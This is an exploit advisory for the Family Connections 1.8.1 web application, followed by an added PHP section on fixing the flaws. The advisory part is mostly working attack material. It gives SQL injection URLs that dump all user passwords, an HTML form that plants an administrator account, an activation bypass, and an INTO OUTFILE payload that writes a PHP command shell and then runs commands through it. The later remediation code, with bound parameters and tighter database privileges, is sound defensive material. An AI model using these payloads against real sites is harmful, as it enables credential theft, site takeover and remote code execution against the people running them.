
Family Connections 1.8.1 Multiple Remote Vulnerabilities







*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: 1.8.1
[+] Website: http://www.familycms.com 

[+] Bugs: [A] Multiple SQL Injection
          [B] Create Admin User
          [C] Blind SQL Injection	

[+] Exploitation: Remote
[+] Date: 25 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = on/off

These bugs allow a registered user to view the
usernames and passwords of all registered users.


- [B] Create Admin User

[-] Requisites: magic_quotes_gpc = off
[-] File affected: register.php, activate.php

This bug allows a guest to create an account with
administrator privileges.


- [C] Blind SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lostpw.php


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23

http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users

http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23


- [B] Create Admin User

<html>
  <head>
    <title>Family Connection 1.8.1 Create Admin User Exploit</title>
  </head>
  <body>
    <p>This exploit creates a user with administrator privileges using the following information:<br>
       Username: root<br>
       Password: toor<br>
    <form action="http://localhost/fcms/register.php" method="POST">
      <input type="hidden" name="username" value="blabla">
      <input type="hidden" name="password" value="blabla">
      <input type="hidden" name="email" value="blabla@blabla.blabla">
      <input type="hidden" name="fname" value="blabla">
      <input type="hidden" name="lname" value="blabla">
      <input type="hidden" name="year" value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root', 'root', 'root@owned.com', '00-00-00', 'root', '7b24afc8bc80e548d66c4e7ff72171c5')#'">
      <input type="submit" name="submit" value="Exploit">
    </form>
  </body>
</html>

To activate accounts:

http://www.site.com/path/activate.php?uid=1 or 1=1&code=


- [C] Blind SQL Injection

POST /path/lostpw.php HTTP/1.1
Host: www.site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 193

email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]); echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '/var/www/htdocs/path/rce.php'#

To execute commands:

http://www.site.com/path/rce.php?cmd=ls


*************************************************

[+] Fix

No fix.


*************************************************

--
Salvatore "drosophila" Fresta
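The advisory offers no fix, but the three bugs share one root cause: request values are concatenated into SQL text. The block below is an added example, not Family Connections code, showing the parameterised pattern that closes each reported entry point. The parameter names (letter, id, poll_id, year, uid, code, email) and the fcms_users table come from the advisory; every other table and column name, the DSN and credentials, and the ACCESS_MEMBER level are assumptions. It also carries the two operational points the advisory's requisites imply: magic_quotes_gpc is not a defence (the numeric vectors in [A] work with it on or off), and the database account should lack the FILE privilege so that INTO OUTFILE, as used in [C], cannot write a file even if a query were ever to slip through.

```php
<?php
declare(strict_types=1);
// Added example (not Family Connections code). Table/column names other than
// fcms_users, the DSN and the access levels are assumptions for illustration.

function db(): PDO {
    // Assumed DSN and credentials. Emulated prepares are off so the MySQL
    // server itself separates query text from parameters. Run the web app's
    // DB account without the FILE privilege: INTO OUTFILE then always fails.
    return new PDO('mysql:host=localhost;dbname=fcms;charset=utf8mb4', 'fcms_web', 'secret', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

// Numeric ids (recipes.php?id=, home.php?poll_id=, activate.php?uid=):
// validate as a positive integer, then bind as an integer. A value such as
// "-1 UNION ALL SELECT ..." is rejected here, whatever magic_quotes_gpc says.
function intParam(array $src, string $name): int {
    $v = filter_var($src[$name] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($v === false) {
        throw new InvalidArgumentException("$name must be a positive integer");
    }
    return $v;
}

// [A] addressbook.php?letter=...: the value feeds a LIKE pattern, so restrict
// it to a single ASCII letter and still pass it as a bound parameter.
function addressbookEntries(PDO $pdo, string $letter): array {
    if (!preg_match('/^[A-Za-z]$/', $letter)) {
        throw new InvalidArgumentException('letter must be a single ASCII letter');
    }
    $stmt = $pdo->prepare('SELECT id, fname, lname, email FROM fcms_address WHERE lname LIKE ? ORDER BY lname');
    $stmt->execute([$letter . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// [A] home.php?poll_id=... (recipes.php?id=... is identical in shape).
function poll(PDO $pdo, int $pollId): ?array {
    $stmt = $pdo->prepare('SELECT id, question, created FROM fcms_polls WHERE id = ?');
    $stmt->bindValue(1, $pollId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// [B] register.php: every field is bound and the privilege level is a
// server-side constant. The extra tuple smuggled through "year" in the
// advisory cannot appear, because bound values are data, never SQL text.
const ACCESS_MEMBER = 3;  // assumed non-admin level in this schema
function registerUser(PDO $pdo, array $in): int {
    $stmt = $pdo->prepare(
        'INSERT INTO fcms_users (access, joindate, fname, lname, email, birthday, username, password)
         VALUES (?, NOW(), ?, ?, ?, ?, ?, ?)'
    );
    $stmt->execute([
        ACCESS_MEMBER,
        $in['fname'],
        $in['lname'],
        $in['email'],
        $in['year'],
        $in['username'],
        password_hash($in['password'], PASSWORD_DEFAULT),  // salted hash, not plain MD5
    ]);
    return (int) $pdo->lastInsertId();
}

// [B] activate.php?uid=1 or 1=1&code=: uid bound as an integer, code as a
// string; "1 or 1=1" never reaches the parser, and the code must also match.
function activateAccount(PDO $pdo, int $uid, string $code): bool {
    $stmt = $pdo->prepare('UPDATE fcms_users SET activated = 1 WHERE id = ? AND activate_code = ?');
    $stmt->bindValue(1, $uid, PDO::PARAM_INT);
    $stmt->bindValue(2, $code, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->rowCount() === 1;
}

// [C] lostpw.php: the email is bound, so a payload ending in INTO OUTFILE is
// just a string that matches no row.
function findUserByEmail(PDO $pdo, string $email): ?array {
    $stmt = $pdo->prepare('SELECT id, username FROM fcms_users WHERE email = ?');
    $stmt->execute([$email]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Usage (assumed request shape):
// $pdo = db();
// $entries = addressbookEntries($pdo, (string) ($_GET['letter'] ?? ''));
// $p = poll($pdo, intParam($_GET, 'poll_id'));
// $ok = activateAccount($pdo, intParam($_GET, 'uid'), (string) ($_GET['code'] ?? ''));
```

The two ingredients matter together: binding stops the value from being parsed as SQL, and the integer validation turns a malformed id into a 4xx instead of an empty result, which is also the signal worth logging, since a stream of failed intParam() calls against poll_id, id and uid is exactly what the [A] and [B] vectors look like from the server side.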
